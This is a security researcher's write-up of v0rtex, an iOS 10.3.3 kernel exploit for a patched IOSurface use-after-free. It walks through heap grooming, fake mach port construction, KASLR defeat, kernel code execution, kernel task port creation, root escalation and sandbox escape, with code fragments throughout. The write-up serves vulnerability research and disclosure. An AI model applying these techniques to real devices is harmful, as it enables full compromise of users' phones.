Siguza, 07. Dec 2017 (updated 12. Dec 2017)

v0rtex

Turning the IOSurface inside out.

Introduction

On December 5th, windknown posted about an IOSurface mach port UaF on the Pangu blog, which had been fixed in iOS 11.2 and reported by Ian Beer. Now I neither speak Chinese nor really trust Google Translate with details, but the PoC on the Pangu blog was enough to illustrate the vulnerability and get me going. :P

Update:
Ian’s exploit for iOS 11 is now out as well!

The Exploit

Freeing and reallocating

The bug decreases the ref count on a user-supplied mach port by one too many. This is very nice because it can leave you with a still-valid userland handle to a freed port which can then hopefully be reallocated with controlled contents, yielding a complete fake port.

Windknown’s PoC uses the same port for first and subsequent registration, but I’d rather not have a freed object referenced more than necessary, so we’ll use two different ports - and more, for the sake of heapcraft. We allocate in this order:

A single mach port called realport.
0x1000 mach ports to spray the ipc.ports zone before port.
A single mach port called port (renamed to fakeport once freed).
Another 0x100 mach ports to spray the ipc.ports zone after port.

We then free port via the bug, and release the 0x1100 ports we sprayed as well. In the ipc.ports zone that will hopefully leave the page on which port resides with all of its elements freed. Once that happens, we can use the mach_zone_force_gc MIG call to get the entire page out of the zone, allowing us to reallocate the port with arbitrary memory instead of just valid mach ports. (Note that mach_zone_force_gc was disabled in iOS 11, but you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should show up as a significant spike.)

One obstacle I faced though was that the IOSurface bug seemed to have some asynchronicity or whatnot - for a short time after IOConnectCallAsyncStructMethod returned, the port seemed to still be valid, however after a sleep(1) it was not. I didn’t feel like hunting down the cause of that, so I simply increased the ref count on port by using mach_ports_register on my own task, which would cause the bug to still drop one ref too many, but not free it anymore. Now after that call returns, we can usleep(100000) to synchronise, and then use mach_ports_register again to decrease the ref on port again, this time freeing it synchronously. And since we call mach_ports_register already, we also register our IOSurfaceRootUserClient handle there because we’re gonna need that for later. All that remains is a call to mach_zone_force_gc and if everything worked out, the memory that contained port is now available for reallocation.

At this point we’re gonna reallocate it, but how exactly and with what contents? My favourite heap allocation primitive is OSUnserializeXML (or OSUnserializeBinary to be exact) because it allows for fine-grained control over allocation and contents, allows for both arbitrary data and pointers, and is used in many places. So since we’re dealing with IOSurface anyway I figured we might as well use IOSurface properties. An IOSurfaceRootUserClient offers external methods 9, 10 and 11 to parse arbitrary data with OSUnserializeXML, store the result in the kernel, and read back or delete that result at any time. I’ll leave the implementation details on this for another time, but they’re effectively the same as IOSurfaceSetValue, IOSurfaceCopyValue and IOSurfaceRemoveValue, just faster since no CoreFoundation object serialisation has to happen.
Alright, so we’ve got to reallocate the freed pages. In order to avoid creating holes, this is best done with allocations of the page size or smaller. On A9 and later the page size is 16KB, but on A8 and earlier it is actually 4KB despite 16KB being exported to userland - so we’re gonna use 0x1000 here. Now, OSData would normally seem like the best choice for binary data, but it turns out that doesn’t go through kalloc anymore for allocations larger than or equal to the page size. The next best choice to me is OSString which works well, so long as you take into account that a null terminator is added when unserialising, so in order to get a 0x1000 allocation, you’ll want to have only 0xfff bytes of serialised data.

Fake port construction

At this point we merely have to put some data into our OSStrings, and the kernel will treat it as a mach port. So let’s start with a look at the structure:

typedef struct {
    uint32_t ip_bits;
    uint32_t ip_references;
    struct {
        kptr_t data;
        uint32_t type;
        uint32_t pad;
    } ip_lock; // spinlock
    struct {
        struct {
            struct {
                uint32_t flags;
                uint32_t waitq_interlock;
                uint64_t waitq_set_id;
                uint64_t waitq_prepost_id;
                struct {
                    kptr_t next;
                    kptr_t prev;
                } waitq_queue;
            } waitq;
            kptr_t messages;
            uint32_t seqno;
            uint32_t receiver_name;
            uint16_t msgcount;
            uint16_t qlimit;
            uint32_t pad;
        } port;
        kptr_t klist;
    } ip_messages;
    kptr_t ip_receiver;
    kptr_t ip_kobject;
    kptr_t ip_nsrequest;
    kptr_t ip_pdrequest;
    kptr_t ip_requests;
    kptr_t ip_premsg;
    uint64_t ip_context;
    uint32_t ip_flags;
    uint32_t ip_mscount;
    uint32_t ip_srights;
    uint32_t ip_sorights;
} kport_t;

(Here kptr_t is just a typedef to a type of the kernel’s pointer size. Also on 32-bit, the two pad fields are missing.)

There is a slight problem now though: we don’t know at which offset the mach ports start. When a page is allocated into a zone with elements of size x, the first element will start at offset 0, the second one at x, then x * 2, etc. Depending on x, that might leave less or more memory at the end of a page unused. To minimise such losses, XNU can expand the allocation size of a zone up to 32KB. On 10.3.3 the size of a mach port is 0xa8 bytes (0x74 for 32-bit), and the ipc.ports zone makes allocations of 0x3000 bytes. That means the first port will be allocated at offset 0x0, the second at 0xa8, etc., and the last port on the first page will start at 0xfc0 and extend onto the second page - but that means the first port on the second page will start at offset 0x1068 rather than 0x1000, and the same thing repeats for the third page as well. The problem with that is that when we reallocate those pages, we don’t know whether they used to be the first, second or third of their chunk - even using an allocation size of 0x3000 ourselves wouldn’t help, since that might as well start on a second or third page and just extend beyond it, since pages are units of their own.
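
To double-check that arithmetic, here is a minimal sketch (not part of the exploit, and the helper name first_elem_offset is made up for illustration). It computes where the first element that begins on a given page of a chunk sits, assuming elements are simply packed back to back from chunk offset 0:

```c
#include <assert.h>
#include <stddef.h>

/*
 * Offset, relative to the start of page `page` (0-based) of a zone chunk, of
 * the first element that begins on that page. Assumes elements of `elem_size`
 * bytes are packed back to back starting at chunk offset 0.
 */
static size_t first_elem_offset(size_t elem_size, size_t page_size, size_t page)
{
    assert(elem_size > 0 && page_size > 0);
    size_t page_start = page * page_size;
    /* Index of the first element starting at or after page_start
     * (ceiling division). */
    size_t index = (page_start + elem_size - 1) / elem_size;
    return index * elem_size - page_start;
}
```

With 0xa8-byte elements and 0x1000-byte pages, first_elem_offset(0xa8, 0x1000, 1) comes out as 0x68, which is the 0x1068 from above relative to the start of the second page.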

So what we’ll have to do now is create a structure that is valid no matter with which of the three possible offsets it is accessed. These offsets are 0x0, 0x68 and 0x28 respectively for first, second and third page. The absolute minimum for a valid port is an intact lock, so we’ll start with that. Long story short, initialisation looks like this:

kport_t triple_kport =
{
    .ip_lock =
    {
        .data = 0x0,
        .type = 0x11,
    },
    .ip_messages =
    {
        .port =
        {
            .waitq =
            {
                .waitq_queue =
                {
                    .next = 0x0,
                    .prev = 0x11,
                }
            },
        },
    },
    .ip_nsrequest = 0x0,
    .ip_pdrequest = 0x11,
};
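
As a sanity check on why exactly those fields are set, here is a small sketch that maps a field of a shifted port back onto our unshifted struct. It assumes 64-bit (kptr_t as uint64_t) and that the buffer is tiled with kport_t structs starting at offset 0; overlay_offset is a made-up helper, not something from the exploit:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef uint64_t kptr_t; /* assumption: 64-bit kernel pointers */

typedef struct {
    uint32_t ip_bits;
    uint32_t ip_references;
    struct { kptr_t data; uint32_t type; uint32_t pad; } ip_lock;
    struct {
        struct {
            struct {
                uint32_t flags;
                uint32_t waitq_interlock;
                uint64_t waitq_set_id;
                uint64_t waitq_prepost_id;
                struct { kptr_t next; kptr_t prev; } waitq_queue;
            } waitq;
            kptr_t messages;
            uint32_t seqno;
            uint32_t receiver_name;
            uint16_t msgcount;
            uint16_t qlimit;
            uint32_t pad;
        } port;
        kptr_t klist;
    } ip_messages;
    kptr_t ip_receiver;
    kptr_t ip_kobject;
    kptr_t ip_nsrequest;
    kptr_t ip_pdrequest;
    kptr_t ip_requests;
    kptr_t ip_premsg;
    uint64_t ip_context;
    uint32_t ip_flags;
    uint32_t ip_mscount;
    uint32_t ip_srights;
    uint32_t ip_sorights;
} kport_t;

_Static_assert(sizeof(kport_t) == 0xa8, "layout should match the 64-bit port size");

/*
 * A port that the kernel believes starts at `shift` bytes into the page has
 * its field at `field_off` land at this offset inside one of our tiled,
 * unshifted kport_t structs.
 */
static size_t overlay_offset(size_t shift, size_t field_off)
{
    return (shift + field_off) % sizeof(kport_t);
}
```

For a shift of 0x68 the lock lands on ip_nsrequest and ip_pdrequest, and for 0x28 it lands on waitq_queue.next and waitq_queue.prev, which is why those carry the same 0x0 and 0x11 values as ip_lock itself.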

Now so far this works, but it’s obvious that as the struct populates, this will become a hazardous deathtrap. So it’d be nice if we could use a first, minimal mach port to detect which offset we’re dealing with, and then reallocate at just that offset without all this cruft. A very viable way to do this was previously outlined by Ian Beer in his mach_portal write-up, making use of the ip_context field. In short, the mach_port_get_context MIG call lets you fetch the ip_context field of a port while touching nothing but that field and the port’s lock. So what does ip_context overlay with when shifted? For the first page that’s just ip_context, for the second page it’s the fields msgcount, qlimit and pad of ip_messages.port, and for the third page it’s the type and pad fields of ip_lock. So the lower 32 bits of ip_context might intersect with ip_lock.type which is rather critical, but that still leaves us with the upper 32 bits in any case. That is plenty, and allows us to store both what offset is being used, as well as an identifier for the OSString object we’re dealing with. So given a number i from which we can derive what key we later need to use to free and reallocate the OSString, this is how we initialise ip_context:

volatile kport_t *dptr = ...;
for(size_t j = 0; j < DATA_SIZE / sizeof(kport_t); ++j)
{
    dptr[j].ip_context = (dptr[j].ip_context & 0xffffffff) | ((uint64_t)(0x10000000 | i) << 32);
    dptr[j].ip_messages.port.pad = 0x20000000 | i;
    dptr[j].ip_lock.pad = 0x30000000 | i;
}

Now when using the result of mach_port_get_context, the bits 0x3000000000000000 tell us whether our port was on page one, two or three, and the bits 0x0fffffff00000000 allow us to identify on which OSString it resides.
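
Taking that value apart could look roughly like this. It is a sketch only: ctx_tag_t, ctx_encode and ctx_decode are names invented here, and the encoding simply mirrors the 0x10000000 / 0x20000000 / 0x30000000 tags from the loop above:

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    unsigned page; /* 1, 2 or 3: which page of the chunk the port was on */
    uint32_t id;   /* the number i identifying the OSString */
} ctx_tag_t;

/* Builds the upper 32 bits of ip_context the same way the loop above does. */
static uint64_t ctx_encode(unsigned page, uint32_t id)
{
    assert(page >= 1 && page <= 3 && id <= 0x0fffffff);
    return (uint64_t)(((uint32_t)page << 28) | id) << 32;
}

/* Splits a value returned by mach_port_get_context into page and id.
 * The lower 32 bits are ignored, since they may overlap ip_lock.type. */
static ctx_tag_t ctx_decode(uint64_t ctx)
{
    ctx_tag_t tag;
    tag.page = (unsigned)((ctx >> 60) & 0x3);
    tag.id   = (uint32_t)((ctx >> 32) & 0x0fffffff);
    return tag;
}
```

A page value of 0 after decoding would mean the port did not end up on one of our OSStrings at all.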

Reading memory and defeating KASLR

Now we can properly reallocate it, but with what? In the end we’ll probably want an IKOT_IOKIT_CONNECT-type port with a fake IOUserClient object, allowing us to call arbitrary kernel code, so at the very least we’ll need to know the kernel slide. To get there, we probably want an arbitrary read primitive first, but for that we need an address to start from, and so far we don’t know a single valid kernel pointer. At this point I figured I had two options:

Leverage a kernel pointer comparison (such as with the clock system port) to brute-force the kernel slide.
Get a valid pointer into our fake port struct somehow and read back the OSString.

The former sounds like a horrible idea in our setting - since we have to change ip_kobject, we’d have to reallocate the OSString over and over, each time risking the memory getting snatched by something else. The latter, however, turns out to be very viable. In the kernel’s struct ipc_port there are a number of struct ipc_port * members, one of which is ip_pdrequest. That field can hold a pointer to a mach port which is to be notified on port death, and it can be set via mach_port_request_notification, provided the target port is of type IKOT_NONE (i.e. target is in userland) and the notification port is a send-once or receive right (from which a send-once one is then made). A very nice thing about the mach_port subsystem is that the mach messages are sent to the task port whose IPC space contains the port, rather than to the port itself (which would cause a major headache for us with our fake port). So let’s create an IKOT_NONE port:

kport_t kport =
{
    .ip_bits = 0x80000000, // IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE
    .ip_references = 100,
    .ip_lock =
    {
        .type = 0x11,
    },
    .ip_messages =
    {
        .port =
        {
            .receiver_name = 1,
            .msgcount = MACH_PORT_QLIMIT_KERNEL,
            .qlimit = MACH_PORT_QLIMIT_KERNEL,
        },
    },
    .ip_srights = 99,
};

Reference counts exist just to prevent deallocation, and MACH_PORT_QLIMIT_KERNEL prevents accidental sending of messages to the port. Now we can register a send-once or receive right, such as e.g. realport on it:

mach_port_t old = MACH_PORT_NULL; // unused
mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, realport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);

And now we merely need to read back the OSString with IOSurfaceRootUserClient’s external method 10, look for a kport_t with ip_pdrequest != 0, and we have the kernel’s address for realport!

Now, how do we read arbitrary memory? A previous version of my exploit used pid_for_task with an IKOT_TASK-type port and a fake task in userland. That allowed for trivial updating of the address to read from, but it also only worked on systems with a shared address space and no SMAP (i.e. A7-A9). In order for it to work on A6 and A10, the fake task would have to be put in kernel memory at a known address, which is not so straightforward.
First there’s the problem of getting data at a known address. So far we don’t know the address of anything but realport, whose contents are not exactly controllable. However since fakeport was originally allocated as a receive right, the same trick that we used to leak realport can again be used on fakeport. That doesn’t just give us the address of fakeport, but of the entire 0x1000 OSString buffer it resides on! That should be enough scratch space for a fake task. :P
But now comes the second problem: updating the address. Unless we want to leak a mere 4 bytes of kernel memory, we’re gonna need to update our fake task’s bsd_info pointer. As with fakeport, the only way to do that seems to be via reallocation of the OSString. For a large number of reads, that sounds like a really bad idea. If only there was a way to just write to that memory… or is there?

Remember ip_context? That field you can not only read from userland, but also set, which means you can write at least as much as 8 bytes directly to a known address. With that, we could overlay our fake port and task in a way that fakeport->ip_context and faketask->bsd_info mapped to the same address - and then we could use mach_port_set_context to update bsd_info, sparing us the reallocations. However that means that if our fake port is at the very beginning of the allocation, most of the fake task’s fields will lie before our allocation. One such field is the reference count, which is accessed by pid_for_task and which might cause the fake task to be freed, something we definitely don’t want. However, there is a mechanism very similar to pid_for_task, but with slightly different constraints: mach_port_get_attributes. For a flavor value of MACH_PORT_DNREQUESTS_SIZE, that will return the value fakeport->ip_requests->ipr_size->its_size, so long as ip_requests is != NULL. That call can again only be made on ports for which the caller has a receive right (unlike pid_for_task), but instead of a 0x550-byte fake task struct, we only have to deal with 0x10 bytes for a fake ip_requests. Also its_size is 4 bytes wide just like the value returned by pid_for_task. So we can pretty much read a 32-bit value from an addr like so:

mach_msg_type_number_t outsz = 1;
int value = 0;
mach_port_set_context(self, fakeport, addr);
mach_port_get_attributes(self, fakeport, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)&value, &outsz);
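
Since kernel pointers are 64 bits wide, following them means stitching two such reads together. Below is a minimal sketch of that, assuming a little-endian target. The read32_fn callback stands in for the two calls above, and mock_read32 with its mock_mem buffer exists only so the snippet can be tried without a kernel; all of these names are hypothetical:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical signature for a 32-bit read primitive. */
typedef uint32_t (*read32_fn)(uint64_t addr, void *ctx);

/* Combines two 32-bit reads into one 64-bit value (little-endian layout). */
static uint64_t read64(read32_fn read32, void *ctx, uint64_t addr)
{
    uint64_t lo = read32(addr, ctx);
    uint64_t hi = read32(addr + 4, ctx);
    return lo | (hi << 32);
}

/* Stand-in memory: holds 0x1122334455667788 in little-endian byte order. */
static const uint8_t mock_mem[8] = {
    0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11
};

/* Mock primitive: treats addr as an index into mock_mem. */
static uint32_t mock_read32(uint64_t addr, void *ctx)
{
    (void)ctx;
    assert(addr + 4 <= sizeof(mock_mem));
    const uint8_t *p = mock_mem + (size_t)addr;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
```

In the real thing each read32 costs two MIG calls, so a 64-bit read costs four.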

Now we can finally start reading from the only other kernel address we know, realport. Jumping from one pointer to the next, we can get a pointer back to the main kernel binary by means of: realport->receiver->is_task->itk_registered[0]->ip_kobject->vtab. That is, from realport we read the struct ipc_space it belongs to (receiver) and from that we get the task_t by which it is owned (is_task), which is our own task. Now remember how we passed the IOSurfaceRootUserClient port to mach_ports_register in the beginning? Thanks to that, we can now read a pointer to that port from itk_registered[0], from that a pointer to the IOSurfaceRootUserClient object itself, and from that a pointer to its C++ vtable, which is, at long last, a value from which we can derive the kernel slide.
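
The last step is plain subtraction. As a sketch, assuming you know the unslid value of the same vtable pointer from the kernelcache you’re targeting (the helper names and every address used with them here are made up):

```c
#include <assert.h>
#include <stdint.h>

/* Slide = pointer leaked at runtime minus the same pointer's unslid value. */
static uint64_t kernel_slide(uint64_t leaked_ptr, uint64_t unslid_ptr)
{
    assert(leaked_ptr >= unslid_ptr);
    return leaked_ptr - unslid_ptr;
}

/* Turns any other unslid kernel address into its runtime address. */
static uint64_t slid(uint64_t unslid_addr, uint64_t slide)
{
    return unslid_addr + slide;
}
```

Every other static offset (gadgets, kernel_map, zone_map and so on) can then be run through slid() before use.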

Kernel code execution

While our fake port is still set for reading, we can also leak most of the IOSurfaceRootUserClient’s vtable contents and start building a fake vtable. That will allow us to create a fake IOUserClient object, to which we can then stash a pointer in fakeport->ip_kobject, and switch the type of fakeport to IKOT_IOKIT_CONNECT. Now what we wanna do is swap out IOUserClient::getExternalTrapForIndex in the fake vtable with something that returns an IOExternalTrap whose contents we control. For that, I use a gadget like so:

add x0, x0, 0x10
ret

That simply returns the address of the memory after the fake object’s vtable pointer and reference count, so we can put an object and a function pointer right after those. Here we run once again into a problem though: we have two pointers that we want to update, but only one ip_context. So we’ll have to extend our write capabilities on the OSString buffer before we can proceed. Now, with the knowledge of the kernel slide and the ability to read arbitrary memory, we could actually build ourselves somewhat of a kernel task port by reading the value of the kernel_map symbol and stashing that into the map field of a fake task - only that we couldn’t call vm_read or vm_write on such a port unless we actually built a valid message queue on our fake port. Such a partial task port is still useful though, because as we’ve seen, there are some APIs that send a MIG message to some other port. One such API is the MIG call mach_vm_remap. That takes a source and a target task, and lets you remap arbitrary memory from the former into the latter. Now the MIG message is sent to the target task port. That means if we wanted to remap kernel memory into our own address space, we would only need our task port to have a functioning message queue! Now, since the OSString buffer was allocated by zalloc, we actually need to pass a zone_map port as source rather than kernel_map, but other than that this call works perfectly:

mach_vm_address_t shmem_addr = 0;
vm_prot_t cur = 0,
          max = 0;
mach_vm_remap(self, &shmem_addr, DATA_SIZE, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, fakeport, fake_addr, false, &cur, &max, VM_INHERIT_NONE);

And with that, we’re done with reallocating for good. We can now edit our fake port directly, as well as anything else residing on our OSString buffer. We could of course also map in any other kernel address, effectively giving us complete kernel r/w. We’re not gonna do that though, but instead go for an even stronger primitive: direct kernel function calls. That still gives us complete r/w via copyin/copyout, but also the ability to call long and complex functions that would be very difficult to simulate with mere r/w. To that end, we construct a fake object on our newly acquired shared memory, and switch the type of fakeport one last time, to IKOT_IOKIT_CONNECT. We can then call iokit_user_client_trap on fakeport, which will lead us to this bit in the kernel:

result = (target->*func)(args->p1, args->p2, args->p3, args->p4, args->p5, args->p6);

We control all of p1 through p6 (passed in via iokit_user_client_trap) as well as target and func (the two pointers after the vtab and ref count) and on top of that, result will be passed back to userland, albeit truncated to 32 bits.

tfp0

Our true goal is a kernel task port like it used to exist pre-10.3, i.e. before Apple started checking against the kernel_task pointer. In order to get around that check, I would ideally like to run this code in the kernel:

vm_map_remap(
    kernel_map,
    &remap_addr,
    sizeof(task_t),
    0,
    VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
    zone_map,
    kernel_task,
    false,
    &dummy,
    &dummy,
    VM_INHERIT_NONE
);
mach_vm_wire(&realhost, kernel_map, remap_addr, sizeof(task_t), VM_PROT_READ | VM_PROT_WRITE);
ipc_port_t newport = ipc_port_alloc_special(ipc_space_kernel);
ipc_kobject_set(newport, remap_addr, IKOT_TASK);
realhost.special[4] = ipc_port_make_send(newport);

Now there are two problems with that: First, that call to vm_map_remap has 11 arguments but our kernel call interface allows us only to pass 7, and second that pointer returned by ipc_port_alloc_special is gonna have its top 32 bits cut off. Getting around the vm_map_remap is rather simple: we just create two new ports with fake tasks representing the kernel_map and the zone_map, and pass those to mach_vm_remap in userland. Getting a 64-bit return value from our kernel call interface isn’t so easy though. What’s easier is to take advantage of the fact that the pointer will point to somewhere in the zone_map, which on iOS is still far smaller than 4GB. That means if we know the base address of the zone_map, the lower 32 bits of a pointer are enough to determine its original value! Knowing the address of the zone_map struct, we merely need to read its header from offset 0x10, and we get a start and end pointer, allowing us to do the necessary computations.
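
The "necessary computations" boil down to something like the following sketch. It assumes the zone_map spans less than 4GB, as stated above; recover_zone_ptr is a made-up name and the addresses in the note below are invented:

```c
#include <assert.h>
#include <stdint.h>

/*
 * Rebuilds a 64-bit pointer into [zm_start, zm_end) from its lower 32 bits.
 * Returns 0 if no address in that range has those lower bits.
 */
static uint64_t recover_zone_ptr(uint32_t low, uint64_t zm_start, uint64_t zm_end)
{
    assert(zm_start < zm_end && zm_end - zm_start <= 0x100000000ULL);
    /* First guess: same upper 32 bits as the start of the map. */
    uint64_t cand = (zm_start & 0xffffffff00000000ULL) | low;
    /* The map may straddle a 4GB boundary, in which case the pointer
     * belongs to the next 4GB window. */
    if (cand < zm_start) {
        cand += 0x100000000ULL;
    }
    if (cand < zm_start || cand >= zm_end) {
        return 0;
    }
    return cand;
}
```

For example, with a map from 0xffffffe0fff00000 to 0xffffffe13ff00000, a truncated result of 0x00001000 maps back to 0xffffffe100001000.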

Now we just call bzero on &self_task->bsd_info->p_ucred->cr_uid with a size of 12 to elevate us to uid 0, and copy the kernel’s p_ucred->cr_label to our own credentials to get us out of the sandbox, and we’re done. :)
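
Why 12? My understanding is that cr_uid is directly followed by two more 32-bit uid fields (cr_ruid and cr_svuid), so 12 bytes zero all three and nothing else. Here is a userland mock of that, where struct mock_cred is a simplified stand-in and not the real kernel struct, and zero_uids is a made-up name:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for the start of the credential's uid fields
 * (assumption: three consecutive 32-bit uids, then unrelated data). */
struct mock_cred {
    uint32_t cr_uid;
    uint32_t cr_ruid;
    uint32_t cr_svuid;
    int16_t  cr_ngroups; /* must stay untouched */
};

_Static_assert(offsetof(struct mock_cred, cr_ngroups) == 12,
               "the three uids should span exactly 12 bytes");

/* Mimics bzero(&cred->cr_uid, 12): zeroes the three uid fields only. */
static struct mock_cred *zero_uids(struct mock_cred *cred)
{
    memset((char *)cred + offsetof(struct mock_cred, cr_uid), 0, 12);
    return cred;
}
```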

Future work

32-bit

In principle all of this should work on 32-bit as well, but things might be different due to different pointer size. In particular the thing with the three possible page offsets might either be less or more complicated, depending on how many pages are chunked into the ipc.ports zone on 32-bit, and resulting from that which fields overlay in a port struct.

I lack a 32-bit device that can go higher than 9.3.5 though, so… I can offer my knowledge to devs wanting to take a stab at it, but I won’t personally do it.

ETA wen?

I don’t know. I suppose this is a good time to start writing my own patchfinder (I want a maintainable one), so… I guess I’ll actually do that. No idea what roadblocks I’ll run into though, or how long that’ll take. But don’t expect anything soon.

Conclusion

Awesome bug, mad props to Ian Beer (and windknown?) for finding it! Also props to both of them for all their previous work, not sure whether we’d all be where we are today without you.

Now, lots of work to be done! If anyone wants to chip in with anything, I’m readily available on Discord (Siguza#7111). For updates on this as well as general iOS hacking, you can follow me on ~~Twitter~~ Mastodon.

The exploit code can be found on GitHub.

References

windknown: IOSurface UaF (PoC)
Ian Beer: async_wake (iOS 11 exploit)
Ian Beer: Through the mach portal (write-up)